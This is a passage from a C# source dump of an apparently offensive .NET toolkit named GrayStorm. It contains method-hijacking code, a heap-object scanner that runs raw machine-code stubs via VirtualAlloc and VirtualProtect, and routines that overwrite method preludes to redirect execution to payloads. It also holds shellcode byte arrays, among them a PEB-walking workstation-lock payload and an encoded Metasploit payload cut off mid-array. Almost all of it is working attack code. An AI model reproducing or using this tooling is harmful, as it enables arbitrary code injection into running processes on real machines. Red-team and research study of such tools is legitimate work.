17 | /// All of the global static variables we need for the project will be declared here. Namely, the array list of storageInformation.
18 | ///
19 | public static class methodHelpers
20 | {
21 | //publics for the class for methodInformation.
22 | public static List StorageInformationArrayList = new List();
23 |
24 | public static Delegate methodInfoToDelegate(System.Reflection.MethodInfo methodIN)
25 | {
26 | Delegate signatureOfTarget = signatures.getSignature(methodIN);
27 | return signatureOfTarget;
28 | }
29 |
30 | //Boring linear search to find the index of the targeted method. O(N).
31 | public static int containedInList(MethodInfo selectedMethod)
32 | {
33 | int x;
34 | for (x = 0; x < StorageInformationArrayList.Count; x++)
35 | {
36 | if (StorageInformationArrayList[x].methodSignature == selectedMethod)
37 | return x;
38 | }
39 | return -1;
40 | }
41 |
42 |
43 | }
44 | #endregion storageInformationHelpers
45 | }
46 |
--------------------------------------------------------------------------------
/memoryHijacking/methodHijacking.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Reflection;
6 |
7 |
8 | namespace GrayStorm
9 | {
10 | class methodHijacking
11 | {
12 | public static void writeAMethod(IntPtr methodIntPtr)
13 | {
14 | assemblyHelpers.writeDynamicShellcode(methodIntPtr);
15 | }
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/memoryHijacking/methodInvoking.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Reflection;
6 |
7 | namespace GrayStorm
8 | {
9 | class methodInvoking
10 | {
11 | #region callMethod
12 | //1.) get the signature of the target. (Static/Non-Satic, Return/Non-Return, Arguments)
13 | public Delegate getMethodDelegate(MethodInfo methodIN)
14 | {
15 | Delegate targetMethodDelegate = null;
16 |
17 | if (methodIN.IsStatic)
18 | System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(methodIN.MethodHandle); //JIT the method!
19 |
20 | targetMethodDelegate = signatures.getSignature(methodIN);
21 |
22 | return targetMethodDelegate;
23 | }
24 |
25 | //2.) Get the function pointer from the Delegate
26 | public IntPtr getIntPtrFromDelegate(Delegate targetIN)
27 | {
28 | try
29 | {
30 | return targetIN.Method.MethodHandle.GetFunctionPointer();
31 | }
32 | catch { return IntPtr.Zero; }
33 | }
34 |
35 | //3.) Call the method if needed/wanted.
36 | public static void fireMethod(IntPtr methodAddress, int whichCall)
37 | {
38 | if (whichCall == 0)
39 | assemblyHelpers.callATrueIntPtr(methodAddress, assemblyHelpers.call_a_fun_ptr);
40 | else if (whichCall == 1)
41 | assemblyHelpers.callATrueIntPtr(methodAddress, assemblyHelpers.call_a_fun_ptr_INT3);
42 | }
43 | #endregion callMethod
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/objectHunter/foundObject.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | public class foundObject
9 | {
10 | public object targetObject;
11 | public string name;
12 | public IntPtr addrOfObj;
13 |
14 | public override string ToString()
15 | {
16 | return name;
17 | }
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/objectHunter/heapObjects.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using GrayStorm;
6 |
7 | namespace GrayStorm.objectHunter
8 | {
9 | public static class heapObjects
10 | {
11 | #region init
12 | public static char clrVersion = '4';
13 | public static int clrSub = 1;
14 | public static int constant = 50000;//can be adjusted.. need better signature :( just till true?
15 |
16 | public delegate IntPtr getMethodTableDel(IntPtr objectIN);
17 |
18 | public static void getAddresses(System.Windows.Forms.ListBox objectsListBox)
19 | {
20 | //see if clr is version 2 or 4
21 | clrVersion = Environment.Version.ToString().ElementAt(0);
22 |
23 | object thisObject = objectsListBox.SelectedItem;
24 | object foundObject = null;
25 | IntPtr obj = IntPtr.Zero;
26 | IntPtr methodTable = IntPtr.Zero;
27 | List matchedObjects = null;
28 | objectsListBox.Items.Clear();
29 | objectsListBox.Items.Add(thisObject);
30 |
31 | if (thisObject.GetType() == typeof(foundObject))
32 | {
33 | foundObject thisFoundObject = thisObject as foundObject;
34 | thisObject = thisFoundObject.targetObject;
35 | }
36 |
37 | //set subAmount on stack for each clr version
38 | if (IntPtr.Size == 4 && clrVersion == '2')
39 | {
40 | if (clrVersion == '2')
41 | clrSub = 1;
42 | else if (clrVersion == '4')
43 | clrSub = 2;
44 | }
45 |
46 | if (IntPtr.Size == 4)
47 | {
48 | obj = getObjectAddr(thisObject);
49 | // System.Windows.Forms.MessageBox.Show("OG Object is at " + obj.ToString("X"));
50 |
51 | methodTable = getObjectMethodTable(obj, getMethodTablex86);
52 |
53 | if (methodTable == IntPtr.Zero)
54 | return;
55 |
56 | Console.WriteLine("OG Object is at " + obj.ToString("X"));
57 | Console.WriteLine("method table is at " + methodTable.ToString("X"));
58 |
59 | // System.Windows.Forms.MessageBox.Show("OG Object is at " + obj.ToString("X"));
60 | // System.Windows.Forms.MessageBox.Show("method table is at " + methodTable.ToString("X"));
61 | matchedObjects = getAllObjects(obj, methodTable, getMethodTablex86, getMethodTablex86);
62 | }
63 | else if (IntPtr.Size == 8)
64 | {
65 | obj = getObjectAddr64(thisObject);
66 | // System.Windows.Forms.MessageBox.Show("OG Object is at " + obj.ToString("X"));
67 |
68 | methodTable = getObjectMethodTable(obj, getMethodTablex64);
69 | // System.Windows.Forms.MessageBox.Show("OG MEtodTable is at " + methodTable.ToString("X"));
70 |
71 | matchedObjects = getAllObjects(obj, methodTable, getMethodTablex64, get3rdEntryx64);
72 | }
73 |
74 |
75 | //unsure if this foreach is needed right now... just take matchedObjects to array?
76 | foreach (IntPtr actualObj in matchedObjects)
77 | {
78 | if (actualObj != null)
79 | {
80 | if (IntPtr.Size == 4)
81 | foundObject = GetInstance(actualObj);
82 | else if (IntPtr.Size == 8)
83 | foundObject = GetInstance64(actualObj);
84 |
85 | //avoid all the thinLocked objects
86 | // var lockedBySomeoneElse = !System.Threading.Monitor.TryEnter(foundObject);
87 | // if (!lockedBySomeoneElse)
88 | // {
89 | // System.Threading.Monitor.Exit(foundObject);
90 | foundObject objTarget = new foundObject();
91 | objTarget.targetObject = foundObject;
92 | objTarget.name = thisObject.ToString();
93 | objTarget.addrOfObj = actualObj;
94 | objectsListBox.Items.Add(objTarget);
95 | //}
96 | }
97 | }
98 | // System.Windows.Forms.MessageBox.Show("num of objects is " + objectsListBox.Items.Count);
99 | }
100 | #endregion init
101 |
102 | #region x86
103 |
104 | //Put wantedObject on the stack and grab its value as an IntPtr.
105 | //The stack is weird when actually running.
106 | //In Visual Studio, the location of refer is known and is easy to use
107 | //as (objectPointer+1) but these values are not present during runtime.
108 | public static IntPtr getObjectAddr(object wantedObject)
109 | {
110 | if (wantedObject == null)
111 | return IntPtr.Zero;
112 |
113 | IntPtr objectPointer = IntPtr.Zero;
114 | unsafe
115 | {
116 | // System.Windows.Forms.MessageBox.Show("Address of objectPointer:" + (uint)(&objectPointer) + " " + *(&objectPointer));
117 | // System.Windows.Forms.MessageBox.Show("Address of refer:" + (uint)(&objectPointer- 3) + " " + *(&objectPointer - 3));
118 | return *(&objectPointer - 3);
119 | }
120 | // return objectPointer;
121 | }
122 |
123 | static public byte[] getMethodTablex86 = new byte[]
124 | {
125 | 0x8b, 0x44, 0x24, 0x04, //mov eax, [esp+4] (arg1 on the stack is the object table)
126 | 0x8b, 0x00, //mov eax, [eax]] (first 4 bytes are the MethodTable)
127 | 0xc3 //ret (return methodTable for comparsion)
128 | };
129 |
130 | static public byte[] get3rdEntryx32 = new byte[]
131 | {
132 | 0xc3
133 | };
134 |
135 | public static object GetInstance(IntPtr ptrIN)
136 | {
137 | object refer = ptrIN.GetType();
138 | IntPtr pointer = ptrIN;
139 |
140 | unsafe
141 | {
142 | *(&pointer - clrSub) = *(&pointer); //move the pointer of our object into the actual object on the stack! This tricks the Framework to think that "object" was declared here!
143 | }
144 | //System.Windows.Forms.MessageBox.Show(refer.ToString());
145 | return refer;
146 | }
147 | #endregion
148 |
149 | #region x64
150 |
151 | public static IntPtr getObjectAddr64(object wantedObject)
152 | {
153 | if (wantedObject == null)
154 | return IntPtr.Zero;
155 |
156 | IntPtr objectPointer = (IntPtr)4;
157 | object refer = wantedObject;
158 | IntPtr objectPointer2 = (IntPtr)8;
159 |
160 | unsafe
161 | {
162 | //System.Windows.Forms.MessageBox.Show("Address of objectPointer:" + (uint)(&objectPointer) + " address of objectPointer 2 " + (uint)(&objectPointer2));
163 | objectPointer = *(&objectPointer + clrSub);
164 | }
165 |
166 | return objectPointer;
167 | }
168 |
169 | static public byte[] getMethodTablex64 = new byte[]
170 | {
171 | 0x48, 0x8b, 0x01, //mov rax, [rcx]
172 | 0xc3 //ret
173 | };
174 |
175 | //call once the location of an object is known to check against it's 3rd table entry :)
176 | static public byte[] get3rdEntryx64 = new byte[]
177 | {
178 | 0x48, 0x8b, 0x41, 0x08, 0x48, 0x83, 0xf8, 0x00,
179 | 0x74, 0x03, 0x48, 0x8b,
180 | 0x00, 0xc3
181 | };
182 |
183 |
184 | public static object GetInstance64(IntPtr wantedObject)
185 | {
186 | if (wantedObject == null)
187 | return IntPtr.Zero;
188 |
189 | IntPtr objectPointer = wantedObject;
190 | object refer = wantedObject.GetType();
191 | IntPtr objectPointer2 = (IntPtr)8;
192 |
193 | unsafe
194 | {
195 | //System.Windows.Forms.MessageBox.Show("Address of objectPointer:" + (uint)(&objectPointer) + " address of objectPointer 2 " + (uint)(&objectPointer2));
196 | *(&objectPointer + clrSub) = *(&objectPointer);
197 | }
198 | //System.Windows.Forms.MessageBox.Show(refer.ToString());
199 | return refer;
200 | }
201 |
202 | #endregion x64
203 |
204 | #region generic
205 | public static IntPtr getObjectMethodTable(IntPtr objectIN, byte[] methodFinderIN)
206 | {
207 | IntPtr p = assemblyHelpers.VirtualAlloc(methodFinderIN);
208 | IntPtr methodTable = IntPtr.Zero;
209 | getMethodTableDel fireShellcode = (getMethodTableDel)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(p, typeof(getMethodTableDel));
210 |
211 | try
212 | {
213 | uint lpflOldProtect = 0;
214 | assemblyHelpers.VirtualProtect(objectIN, (uint)IntPtr.Size, (uint)0x40, out lpflOldProtect);
215 | methodTable = fireShellcode(objectIN);
216 | }
217 | catch (System.Exception ex)
218 | {
219 | System.Windows.Forms.MessageBox.Show("Failed to get MethodTable " + ex.Message);
220 | assemblyHelpers.VirtualFree(p, 0, 0x8000);
221 | return IntPtr.Zero;
222 | }
223 | assemblyHelpers.VirtualFree(p, 0, 0x8000);
224 | return methodTable;
225 | }
226 |
227 | /*Scan through heap and compare first four bytes of all objects to the method table pointer...
228 | requires more or less a brute force approach :( (for now) */
229 | public static List getAllObjects(IntPtr firstObjectPointer, IntPtr methodTable, byte[] typeOfASM, byte[] entryIN)
230 | {
231 | List matchedObjects = new List();
232 |
233 | int counter = 1;
234 | int i = 0;
235 | int err = 0;
236 | uint lpflOldProtect = 0;
237 | IntPtr testObjectLocation = IntPtr.Zero;
238 | IntPtr testMethodTable = IntPtr.Zero;
239 | IntPtr test3rdEntry = IntPtr.Zero;
240 | IntPtr size = IntPtr.Zero;
241 | object WORK = null;
242 | IntPtr getMethodTablefuncPtr = assemblyHelpers.VirtualAlloc(typeOfASM);
243 | getMethodTableDel fireShellcode = (getMethodTableDel)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(getMethodTablefuncPtr, typeof(getMethodTableDel));
244 |
245 | IntPtr get3rdEntry = assemblyHelpers.VirtualAlloc(entryIN);
246 | getMethodTableDel getSecondRef = (getMethodTableDel)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(get3rdEntry, typeof(getMethodTableDel));
247 |
248 | IntPtr thirdTable = getSecondRef(firstObjectPointer);
249 | // System.Windows.Forms.MessageBox.Show("Third entry at " + thirdTable.ToString("X"));
250 |
251 | //count down first until out of the heap
252 | while (true)
253 | {
254 | try
255 | {
256 | i = counter * IntPtr.Size;
257 | counter++;
258 | testObjectLocation = new IntPtr(firstObjectPointer.ToInt64() - i); //get a byte value to test on for an object
259 | // assemblyHelpers.VirtualProtect(testObjectLocation, (uint)IntPtr.Size, (uint)0x04, out lpflOldProtect);
260 | testMethodTable = fireShellcode(testObjectLocation);
261 |
262 | if (testMethodTable == methodTable)
263 | {
264 | test3rdEntry = getSecondRef(testObjectLocation);
265 | if (test3rdEntry == thirdTable)
266 | {
267 | Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));
268 |
269 | if (IntPtr.Size == 4)
270 | WORK = GetInstance(testObjectLocation);
271 | else if (IntPtr.Size == 8)
272 | WORK = GetInstance64(testObjectLocation);
273 |
274 | matchedObjects.Add(testObjectLocation);
275 |
276 | Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));
277 | err = 0;
278 | }
279 | }
280 |
281 | }
282 | catch (Exception ex)
283 | {
284 | if (ex.Message.Contains("Attempted to read or write protected memory") || ex.Message.Contains("AccessViolationException"))
285 | {
286 | err++;
287 | if (err > 20)
288 | break;
289 | }
290 | }
291 | }
292 |
293 | System.Windows.Forms.MessageBox.Show(testObjectLocation.ToString("X"));
294 | counter = 1;
295 | err = 0;
296 | //count down first until out of the heap
297 | while (true)
298 | {
299 | try
300 | {
301 | i = counter * IntPtr.Size;
302 | counter++;
303 | testObjectLocation = new IntPtr(firstObjectPointer.ToInt64() + i); //get a byte value to test on for an object
304 | assemblyHelpers.VirtualProtect(testObjectLocation, (uint)IntPtr.Size, (uint)0x04, out lpflOldProtect);
305 | testMethodTable = fireShellcode(testObjectLocation);
306 |
307 | if (testMethodTable == methodTable)
308 | {
309 | test3rdEntry = getSecondRef(testObjectLocation);
310 | if (test3rdEntry == thirdTable)
311 | {
312 | Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));
313 |
314 | if (IntPtr.Size == 4)
315 | WORK = GetInstance(testObjectLocation);
316 | else if (IntPtr.Size == 8)
317 | WORK = GetInstance64(testObjectLocation);
318 |
319 | matchedObjects.Add(testObjectLocation);
320 |
321 | Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));
322 | err = 0;
323 | }
324 | }
325 | }
326 | catch (Exception ex)
327 | {
328 | if (ex.Message.Contains("Attempted to read or write protected memory") || ex.Message.Contains("AccessViolationException"))
329 | {
330 | err++;
331 | if (err > 20)
332 | break;
333 | }
334 |
335 | }
336 | }
337 | // System.Windows.Forms.MessageBox.Show(testObjectLocation.ToString("X"));
338 |
339 |
340 | assemblyHelpers.VirtualFree(getMethodTablefuncPtr, 0, 0x8000);
341 | return matchedObjects;
342 | }
343 | #endregion generic
344 | }
345 | }
--------------------------------------------------------------------------------
/shellcodes/CToAsmAttackChain.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | public class CToAsmAttackChain
9 | {
10 | #region x86 attack chains
11 | ///
12 | //Cleanup for the payload to restore the origional method.
13 | //Requires 12 bytes for 32bit.
14 | ///
15 | /// The index in StorageInformation of the Method that will be changed
16 | /// The pure IntPtr of the Method that is changing
17 | /// The index in the payload of where 12 bytes can be written.
18 | static public void payloadCleaner(int containedIndex, IntPtr methodPointer, int indexToStartCleaning)
19 | {
20 | int returnMethod = (int)methodPointer.ToInt64();
21 | int length = GrayStorm.assemblyHelpers.holder.Length - indexToStartCleaning;
22 | GrayStorm.assemblyHelpers.holder[length] = 0xba; //mov edx
23 | GrayStorm.assemblyHelpers.holder[length + 1] = (byte)(containedIndex);
24 | GrayStorm.assemblyHelpers.holder[length + 2] = (byte)(containedIndex >> 8);
25 | GrayStorm.assemblyHelpers.holder[length + 3] = (byte)(containedIndex >> 16);
26 | GrayStorm.assemblyHelpers.holder[length + 4] = (byte)(containedIndex >> 24); //contained index
27 | GrayStorm.assemblyHelpers.holder[length + 5] = 0xb8; //mov eax
28 | GrayStorm.assemblyHelpers.holder[length + 6] = (byte)(returnMethod);
29 | GrayStorm.assemblyHelpers.holder[length + 7] = (byte)(returnMethod >> 8);
30 | GrayStorm.assemblyHelpers.holder[length + 8] = (byte)(returnMethod >> 16);
31 | GrayStorm.assemblyHelpers.holder[length + 9] = (byte)(returnMethod >> 24); //move eax to returnMethod address
32 | GrayStorm.assemblyHelpers.holder[length + 10] = 0xff;
33 | GrayStorm.assemblyHelpers.holder[length + 11] = 0xd0; //call eax
34 | }
35 |
36 | ///
37 | //Create the new method prelude that will be plotted over the target method.
38 | ///
39 | /// The address of the payload. Will be converted into a 7 byte preleude.
40 | ///
41 | static public byte[] newPrelude(IntPtr payloadAddress)
42 | {
43 | int payloadIntPtr = (int)payloadAddress.ToInt64();
44 | byte[] newMemory = new byte[8];
45 | newMemory[0] = 0xb8;
46 | newMemory[1] = (byte)(payloadIntPtr);
47 | newMemory[2] = (byte)(payloadIntPtr >> 8);
48 | newMemory[3] = (byte)(payloadIntPtr >> 16);
49 | newMemory[4] = (byte)(payloadIntPtr >> 24); //move eax to payload address
50 | newMemory[5] = 0xff;
51 | newMemory[6] = 0xd0; //call eax
52 | newMemory[7] = 0xc3; //ret
53 | return newMemory;
54 | }
55 |
56 | //TODO: 64bit attack
57 | //20 bytes needed for 64bit theoretically
58 | /// The index in StorageInformation of the Method that will be changed
59 | /// The pure IntPtr of the Method that is changing
60 | /// The index in the payload of where 12 bytes can be written.
61 | static public void payloadCleaner64(int containedIndex, IntPtr methodPointer, int indexToStartCleaning)
62 | {
63 | Int64 returnMethod = (Int64)methodPointer.ToInt64();
64 | int length = GrayStorm.assemblyHelpers.holder.Length - indexToStartCleaning;
65 | GrayStorm.assemblyHelpers.holder[length] = 0x48;//xor rax, rax
66 | GrayStorm.assemblyHelpers.holder[length + 1] = 0x31;//xor rax, rax
67 | GrayStorm.assemblyHelpers.holder[length + 2] = 0xc0;//xor rax, rax
68 | GrayStorm.assemblyHelpers.holder[length + 3] = 0xba;//mov edx, #
69 | GrayStorm.assemblyHelpers.holder[length + 4] = (byte)(containedIndex);
70 | GrayStorm.assemblyHelpers.holder[length + 5] = (byte)(containedIndex >> 8);
71 | GrayStorm.assemblyHelpers.holder[length + 6] = (byte)(containedIndex >> 16);
72 | GrayStorm.assemblyHelpers.holder[length + 7] = (byte)(containedIndex >> 24); //contained index
73 | GrayStorm.assemblyHelpers.holder[length + 8] = 0x48;//mov rax, #
74 | GrayStorm.assemblyHelpers.holder[length + 9] = 0xb8;//mov edx, #
75 | GrayStorm.assemblyHelpers.holder[length + 10] = (byte)(returnMethod);//move rax to returnMethod address
76 | GrayStorm.assemblyHelpers.holder[length + 11] = (byte)(returnMethod >> 8);
77 | GrayStorm.assemblyHelpers.holder[length + 12] = (byte)(returnMethod >> 16);
78 | GrayStorm.assemblyHelpers.holder[length + 13] = (byte)(returnMethod >> 24);
79 | GrayStorm.assemblyHelpers.holder[length + 14] = (byte)(returnMethod >> 32);
80 | GrayStorm.assemblyHelpers.holder[length + 15] = (byte)(returnMethod >> 40);
81 | GrayStorm.assemblyHelpers.holder[length + 16] = (byte)(returnMethod >> 48);
82 | GrayStorm.assemblyHelpers.holder[length + 17] = (byte)(returnMethod >> 56);
83 | GrayStorm.assemblyHelpers.holder[length + 18] = 0xff;//call rax
84 | GrayStorm.assemblyHelpers.holder[length + 19] = 0xd0;
85 | }
86 |
87 |
88 | ///
89 | //Create the new method prelude that will be plotted over the target method.
90 | ///
91 | /// The address of the payload. Will be converted into a 7 byte preleude.
92 | ///
93 | static public byte[] newPrelude64(IntPtr payloadAddress)
94 | {
95 | Int64 payloadIntPtr = (Int64)payloadAddress.ToInt64();
96 | byte[] newMemory = new byte[12];
97 | newMemory[0] = 0x48;
98 | newMemory[1] = 0xb8;
99 | newMemory[2] = (byte)(payloadIntPtr);
100 | newMemory[3] = (byte)(payloadIntPtr >> 8);
101 | newMemory[4] = (byte)(payloadIntPtr >> 16);
102 | newMemory[5] = (byte)(payloadIntPtr >> 24);
103 | newMemory[6] = (byte)(payloadIntPtr >> 32);
104 | newMemory[7] = (byte)(payloadIntPtr >> 40);
105 | newMemory[8] = (byte)(payloadIntPtr >> 48);
106 | newMemory[9] = (byte)(payloadIntPtr >> 56); //move rax to payload address
107 | newMemory[10] = 0xff;
108 | newMemory[11] = 0xd0; //call rax
109 | return newMemory;
110 | }
111 | #endregion x86 attack chains
112 | }
113 | }
114 |
--------------------------------------------------------------------------------
/shellcodes/dataBox.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | #region dataBox
9 | public class dataBox
10 | {
11 | public string name;
12 | public byte[] data;
13 | public int indexToStartCleaning;
14 |
15 | public dataBox(string nameIN, byte[] dataIN, int indexToStartCleaningIN)
16 | {
17 | name = nameIN;
18 | data = dataIN;
19 | indexToStartCleaning = indexToStartCleaningIN;
20 | }
21 |
22 | public override string ToString()
23 | {
24 | return name;
25 | }
26 | }
27 | #endregion dataBox
28 | }
29 |
--------------------------------------------------------------------------------
/shellcodes/payloads.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm.shellcodes
7 | {
8 | class payloads
9 | {
10 | #region init
11 | public static System.Collections.Generic.List payloadsList()
12 | {
13 | System.Collections.Generic.List payloads = new List();
14 | if (IntPtr.Size == 4)
15 | {
16 | payloads.Add(new dataBox("returnTrue", returnTrue, 0));
17 | payloads.Add(new dataBox("returnFalse", returnFalse, 0));
18 | payloads.Add(new dataBox("lockWorkSation", lockWorkSation, 0));
19 | payloads.Add(new dataBox("testingShellcodeFire", testingShellcodeFire, 21));
20 | }
21 | else
22 | {
23 | payloads.Add(new dataBox("message box 64bit Topher", test64BitMessageBox, 0));
24 | payloads.Add(new dataBox("test dat hook", SixtyFourbitHookTest, 148));
25 | payloads.Add(new dataBox("Return True", returnTrue64, 0));
26 | payloads.Add(new dataBox("Return False", returnFalse64, 0));
27 | }
28 | return payloads;
29 | }
30 |
31 | public static System.Collections.Generic.List metaSploitList()
32 | {
33 | System.Collections.Generic.List payloads = new List();
34 | if (IntPtr.Size == 4)
35 | {
36 | payloads.Add(new dataBox("msfCALC", msfCALC, 0));
37 | }
38 | else
39 | {
40 | payloads.Add(new dataBox("64bit Test MSF", test64Bit, 0));
41 | }
42 | return payloads;
43 | }
44 |
45 | #endregion init
46 |
47 | #region x86
48 | static public byte[] returnTrue = new byte[]
49 | {
50 |
51 | 0x31, 0xc0, //xor eax, eax &
52 | 0x40, //inc eax
53 | 0xc3 //ret
54 |
55 | };
56 |
57 | static public byte[] returnFalse = new byte[]
58 | {
59 |
60 | 0x60, //popad
61 | 0x31, 0xc0, //xor eax, eax &
62 | 0x89, 0x44, 0x24, //mov eax X
63 | 0x1c,
64 | 0x61, //pushad
65 | 0xc3 //ret
66 |
67 | };
68 |
69 | static public byte[] lockWorkSation = new byte[]
70 | {
71 |
72 | 0xe8, 0x0b, 0x00, 0x00, 0x00, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e,
73 | 0x64, 0x6c, 0x6c, 0x00, 0x5b, 0x60, 0x89, 0xe5, 0x83, 0xec, 0x08, 0x64,
74 | 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14,
75 | 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x40, //walk the PEB and get 4th entry for kernel32 base address!
76 | 0x10, 0x89, 0x45, 0xfc, 0x50, 0x56, 0x68,
77 | 0x8e, 0x4e, 0x0e, 0xec, 0xff, 0x75, 0xfc, 0xe8, 0x33, 0x00, 0x00, 0x00,
78 | 0x53, 0xff, 0xd0, 0x89, 0x45, 0xf8, 0x5e, 0x58, 0xe8, 0x00, 0x00, 0x00,
79 | 0x00, 0x68, 0x8f, 0xe6, 0x24, 0x57, 0xff, 0x75, 0xf8, 0xe8, 0x19, 0x00,
80 | 0x00, 0x00, 0xff, 0xd0, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x68, 0x7e, 0xd8,
81 | 0xe2, 0x73, 0xff, 0x75, 0xfc, 0xe8, 0x05, 0x00, 0x00, 0x00, 0x31, 0xf6,
82 | 0x56, 0xff, 0xd0, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b, 0x45, 0x3c, 0x8b,
83 | 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01,
84 | 0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0x31,
85 | 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
86 | 0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01,
87 | 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04,
88 | 0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3
89 | };
90 |
91 |
92 |
93 | static public byte[] call_a_fun_ptr = new byte[]
94 | {
95 | 0x60, //pushad
96 | 0x8b, 0x44, 0x24, 0x24, //mov eax, [esp - 0x24]
97 | 0xff, 0xd0, //call eax
98 | 0x61, //popad
99 | 0xc3//ret
100 | };
101 |
102 |
103 | //21 bytes from bottom there is room for the hook before the last ret...
104 | static public byte[] testingShellcodeFire = new byte[]
105 | {
106 |
107 | 0x55, 0x89, 0xe5, 0x89, 0xe7, 0x68, 0x6c, 0x6c, 0x00, 0x00, 0x68, 0x33,
108 | 0x32, 0x2e, 0x64, 0x68, 0x75, 0x73, 0x65, 0x72, 0x89, 0xe3, 0x89, 0xe5,
109 | 0x83, 0xec, 0x40, 0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c,
110 | 0x8b, 0x70, 0x14, 0x8b, 0x16, 0x8b, 0x12, 0x8b, 0x12, 0xad, 0x8b, 0x52,
111 | 0x10, 0x89, 0x55, 0xfc, 0x50, 0x56, 0x68, 0x8e, 0x4e, 0x0e, 0xec, 0xff,
112 | 0x75, 0xfc, 0xe8, 0x53, 0x00, 0x00, 0x00, 0x53, 0xff, 0xd0, 0x89, 0x45,
113 | 0xf8, 0x5e, 0x58, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x68, 0xa8, 0xa2, 0x4d,
114 | 0xbc, 0xff, 0x75, 0xf8, 0xe8, 0x39, 0x00, 0x00, 0x00, 0x68, 0x6f, 0x78,
115 | 0x20, 0x00, 0x68, 0x61, 0x67, 0x65, 0x42, 0x68, 0x4d, 0x65, 0x73, 0x73,
116 | 0x68, 0x65, 0x72, 0x73, 0x20, 0x68, 0x54, 0x6f, 0x70, 0x68, 0x89, 0xe3,
117 | 0x68, 0x73, 0x74, 0x20, 0x00, 0x68, 0x79, 0x20, 0x74, 0x65, 0x68, 0x53,
118 | 0x69, 0x6c, 0x6c, 0x89, 0xe1, 0x6a, 0x00, 0x53, 0x51, 0x6a, 0x00, 0xff,
119 | 0xd0, 0x83, 0xc4, 0x40, 0xeb, 0x4e, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b,
120 | 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b,
121 | 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee,
122 | 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf,
123 | 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b,
124 | 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01,
125 | 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3,
126 | 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
127 | 0x90, 0x90, 0x90, 0x90, 0x90,
128 | 0x89, 0xfc, 0x5d,
129 | //0x58, 0x83, 0xe8, 0x07, 0x50,
130 | 0xc3
131 | };
132 |
133 |
134 | static public byte[] msfCALC = new byte[]
135 | {
136 | 0xd9, 0xe9, 0xd9, 0x74, 0x24, 0xf4, 0xbb, 0x0b, 0xc7, 0x22, 0xd6, 0x5e, 0x33, 0xc9, 0xb1,
137 | 0x33, 0x31, 0x5e, 0x17, 0x03, 0x5e, 0x17, 0x83, 0xcd, 0xc3, 0xc0, 0x23, 0x2d, 0x23, 0x8d,
138 | 0xcc, 0xcd, 0xb4, 0xee, 0x45, 0x28, 0x85, 0x3c, 0x31, 0x39, 0xb4, 0xf0, 0x31, 0x6f, 0x35,
139 | 0x7a, 0x17, 0x9b, 0xce, 0x0e, 0xb0, 0xac, 0x67, 0xa4, 0xe6, 0x83, 0x78, 0x08, 0x27, 0x4f,
140 | 0xba, 0x0a, 0xdb, 0x8d, 0xef, 0xec, 0xe2, 0x5e, 0xe2, 0xed, 0x23, 0x82, 0x0d, 0xbf, 0xfc,
141 | 0xc9, 0xbc, 0x50, 0x88, 0x8f, 0x7c, 0x50, 0x5e, 0x84, 0x3d, 0x2a, 0xdb, 0x5a, 0xc9, 0x80,
